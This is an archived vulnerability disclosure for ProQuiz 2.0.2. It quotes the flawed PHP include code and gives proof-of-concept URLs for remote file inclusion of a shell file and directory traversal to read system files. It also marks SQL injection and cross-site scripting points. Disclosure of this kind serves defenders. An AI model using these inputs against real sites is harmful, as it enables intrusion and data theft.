ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection: Posted Aug 14, 2012; Authored by L0n3ly-H34rT; ProQuiz version 2.0.2 suffers from cross site scripting, local file inclusion, remote file inclusion, and remote SQL injection vulnerabilities.; tags | exploit, remote, local, vulnerability, code execution, xss, sql injection, file inclusion; SHA-256 | cd96527f58d918d01dbe7ff75611b1729daf91b7449eeb441565cef7115b0a2a; Download | Favorite | View

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

####################################################
### Exploit Title: ProQuiz v2.0.2 - Multiple Vulnerabilities
### Date: 18/7/2012
### Author: L0n3ly-H34rT
### My Site: http://se3c.blogspot.com/
### Contact: l0n3ly_h34rt@hotmail.com
### Vendor Homepage: http://proquiz.softon.org/
### Software Link: http://code.google.com/p/proquiz/downloads/list
### Tested on: Linux/Windows
####################################################
 
1- Remote File Include :
 
* In File (my_account.php) in line 114 & 115 :
 
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
 
* P.O.C :
 
First register and login in your panel and paste that's url e.g. :
 
http://127.0.0.1/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?
 
* Note :
 
Must be allow_url_include=On
 
-----------------------------------------------------------------------
 
2- Local File Include :
 
* In File (my_account.php) in line 114 & 115 :
 
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
 
* P.O.C :
 
First register and login in your panel and paste that's url e.g. :
 
http://127.0.0.1/full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg
 
* Note :
 
Must be magic_quotes_gpc = Off
 
---------------------------------------------------------------------
 
3- Remote SQL Injection & Blind SQL Injection :
 
* In Two Files :
 
A- First ( answers.php ) in line 55 :
 
<?php echo $_GET['instid']; ?>
 
B- Second ( functions.php ) In :
 
$_POST['email']
 
$_POST['username']
 
* P.O.C :
 
A- First :
 
http://127.0.0.1/full/answers.php?action=answers&instid=[SQL]
 
B- Second :
 
About Email :
 
In URL:
 
http://127.0.0.1/full/functions.php?action=recoverpass
 
Inject Here In POST Method :
 
email=[SQL]
 
About Username :
 
In URL:
 
http://127.0.0.1/full/functions.php?action=edit_profile&type=username
 
Inject Here In POST Method :
 
username=[SQL]
 
-------------------------------------------------------------------------------------
 
4 - Cross Site Scripting :
 
e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]
 
-----------------------------------------------------------------------------------
 
# Greetz to my friendz
 
References:
 
http://se3c.blogspot.com/
http://code.google.com/p/proquiz/downloads/list

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

Share This

ProQuiz 2.0.2 LFI / RFI / XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems